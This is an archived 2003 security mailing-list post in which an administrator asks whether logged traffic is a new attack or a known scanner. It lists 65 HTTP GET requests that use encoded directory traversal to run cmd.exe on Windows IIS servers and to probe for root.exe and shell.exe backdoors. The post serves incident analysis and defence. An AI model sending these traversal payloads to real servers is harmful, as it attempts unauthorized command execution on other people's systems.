New attack or old Vulnerability Scanner?

From: Mark Embrich (mark_embrichat_private)
Date: Thu Apr 24 2003 - 16:43:43 PDT

  • Next message: Tobias Klein: "Re: msamba" 

    
 ('binary' encoding is not supported, stored as-is)
Hello,

Does anyone recognize this pattern of a TCP connect scan, then 65 GETs?
Note that it also included:  "User-Agent:.Mozilla/3.0.
(compatible;.Indy.Library)...."
For which my googling tells me that this attack/scanner is probably 
built using Borland Delphi/C++ Builder suite.

I've so far received 3 of these from 2 different IP addresses.
The first two were from a Comcast cable user.
The last was from a Cox Communications IP.

Thanks,
Mark Embrich

0.	Scan TCP 80
1.	GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
2.	GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
3.	GET./_vti_bin/.%252e/.%252e/.%252e/.%
252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
4.	GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
5.	GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%
35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
6.	GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
7.	GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
8.	GET./_vti_bin/..%255c..%255c..%255c..%255c..%
255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
9.	GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
10.	GET./_vti_bin/..%c0%af../..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
11.	GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
12.	GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
13.	GET./adsamples/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
14.	GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
15.	GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
16.	GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
17.	GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%
252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
18.	GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
19.	GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
20.	GET./iisadmpwd/..%c0%af../..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
21.	GET./msadc/.%252e/.%252e/.%252e/.%
252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
22.	GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
23.	GET./msadc/..%%35%63../..%%35%63../..%%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
24.	GET./MSADC/..%%35c..%%35c..%%35c..%%
35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
25.	GET./msadc/..%%35c../..%%35c../..%%
35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
26.	GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
27.	GET./msadc/..%25%35%63../..%25%35%63../..%25%35%
63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
28.	GET./msadc/..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
29.	GET./msadc/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
30.	GET./msadc/..%c0%af../..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
31.	GET./msadc/..%c0%af../..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
32.	GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%
af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1..
33.	GET./msdac/root.exe?/c+dir+c:.HTTP/1.1..
34.	GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1..
35.	GET./PBServer/..%%35%63..%%35%63..%%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
36.	GET./PBServer/..%%35c..%%35c..%%
35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
37.	GET./PBServer/..%25%35%63..%25%35%63..%25%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
38.	GET./PBServer/..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
39.	GET./Rpc/..%%35%63..%%35%63..%%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
40.	GET./Rpc/..%%35c..%%35c..%%
35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
41.	GET./Rpc/..%25%35%63..%25%35%63..%25%35%
63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
42.	GET./Rpc/..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
43.	GET./samples/..%255c..%255c..%255c..%255c..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
44.	GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
45.	GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
46.	GET./scripts/.%252e/.%
252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
47.	GET./scripts/..%252f..%252f..%252f..%
252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
48.	GET./scripts/..%255c..%
255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
49.	GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
50.	GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%
AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
51.	GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
52.	GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
53.	GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%
1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
54.	GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
55.	GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
56.	GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%
9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
57.	GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
58.	GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
59.	GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
60.	GET./scripts/..%e0%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
61.	GET./scripts/..%f0%80%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
62.	GET./scripts/..%f8%80%80%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
63.	GET./scripts/..%fc%80%80%80%80%
af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1..
64.	GET./scripts/root.exe?/c+dir+c:.HTTP/1.1..
65.	GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1..

----------------------------------------------------------------------------
Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the 
world's premier event for IT and network security experts.  The two-day 
Training features 6 hand-on courses on May 12-13 taught by professionals.  
The two-day Briefings on May 14-15 features 24 top speakers with no vendor 
sales pitches.  Deadline for the best rates is April 25.  Register today to 
ensure your place. http://www.securityfocus.com/BlackHat-incidents 
----------------------------------------------------------------------------

    

    



    

    


This archive was generated by hypermail 2b30 
: Fri Apr 25 2003 - 11:43:04 PDT